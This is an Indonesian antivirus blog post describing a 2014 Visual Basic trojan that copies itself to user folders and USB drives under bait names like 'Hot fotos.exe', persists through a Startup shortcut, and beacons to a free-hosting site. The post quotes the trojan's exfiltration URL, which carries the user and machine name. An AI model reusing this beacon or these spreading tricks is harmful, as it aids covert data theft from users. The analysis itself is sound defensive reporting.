Xps, Trojan dari Oriontronproject

Posted in Smadav, Trojan, Virus Asing on Feb 15, 2014

Dengan modal nekat, trojan yang satu ini memanfaatkan layanan webhosting gratis untuk melancarkan aksinya, entah untuk mencuri data apa dia (virus trojan) dengan mengirimkan sejumlah sedikit paket data ke alamat situs  (yang sekarang sudah tidak bisa digunakan) dengan formatan username & machine name & datetime:

http://www.oriontronproject.site11.com/post.php?files=&user=Administrator&machine=SMADAV-BA9B1F20&datetime=02-15-2014*17:55:02

 

Karakteristik Virus

Dibuat menggunakan: Microsoft Visual Basic v5.0/v6.0
Ukuran file: 140 KB (143,360 bytes)

Aksi Virus

Tidak banyak aksinya, karena memang tujuan dibuatnya sepertinya hanya untuk menjadi trojan, bukan virus yang suka menggandakan diri dengan banyak pada data storage seperti flashdisk misalnya dengan penggandaan sebanyak file atau folder yang ada, bukan.

Saat virus ini aktif pada komputer, maka akan meng-copy-kan dirinya ke direktori Administrator dengan nama file yang acak.

Tak lupa meng-copy-kan pada flashdisk yang ada dengan nama file “Hot fotos.exe” dan “My Musik(2013).exe”.

Virus ini juga membuat sebuah file shortcut pada Startup, yang nantinya akan memanggil file virus yang ada pada direktori Administrator tadi.

Sedikit kesalahan dalam proses pengiriman data, seharusnya dia menyembunyikan proses tersebut dari munculnya browser pada layar Desktop, hal ini tentu menjadi hal yang riskan jika ingin menjalankan aksi, khususnya jika user sadar kalau dia (user) tidak pernah mengakses ke alamat situs yang demikian.

Cara Membersikahkan

Smadav dapat dengan mudah membersihkan virus ini dari komputer, cukup lakukan scanning, dan fix saat selesai dari proses scanning.

Sebelum.

Sesudah.

 

Link terkait:
http://www.threatexpert.com/report.aspx?md5=9b48fba9b6d2a24049a1a4f883f24a64

 

Leave a Reply


  • Search

    Loading
  • Wall

    Previous Next
    Latest on Fri, 08:20 pm

    Azis: @ CEMEWEW, you can go to on http://www.konfirmasi.com/ fo asking to the Smadav Team.

    Azis: @Ransford Odumang, you can inform it to on Smadav email: Smadav@gmail.com.

    Ransford Odumang: I lost my licence key by formatting my pc , i want it back

    CEMEWEW: gan,, ane kna virus yg ngehidden file, tapi bukan virus shortcut, didalemnya ada folder 2 folder {2a40100f-de55-d1ca-1c90-ac00adec4c50} dan autorun.inf di dalem autorun.inf ada file protection for autorun, gimana tuh [...]

    Azis: @fajar, download lagi di http://www.smadav.net

    fajar: tolong mengapa komputer sayatidak bisa buat donwlod

    Azis: @evalyn kasivo, If you wanna get it, You go to on http://www.smadav.net/?lang=en to download it.

    evalyn kasivo: how can i get into this

    Bentshu maitele lincoln: GREAT

    Ricky: Sebagai catatan : Smadav adalah antivirus pelengkap.. dan sebagai antivirus pelengkap maka smadav sudah tergolong the best made in Indonesia free antivirus.. Saran saya gabungkan avast [...]

    » Tuliskan komentar Anda :